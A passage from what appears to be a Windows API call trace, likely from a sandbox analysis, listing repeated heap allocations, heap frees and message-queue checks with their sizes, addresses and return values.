lpMsg=0x61ee24) returned 0 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.956] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0075.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0075.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690930 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690810 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690800 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e108 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.958] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.958] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.958] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.958] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.958] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.958] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.958] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.959] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.959] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b198 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e1b0 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e6d8 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e648 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b1b0 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e210 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab98 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.960] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e5d0 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76abb0 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.961] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e5d0 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab98 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76abf8 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e210 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b1b0 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e648 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e6d8 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b198 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e3a8 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.963] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.964] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 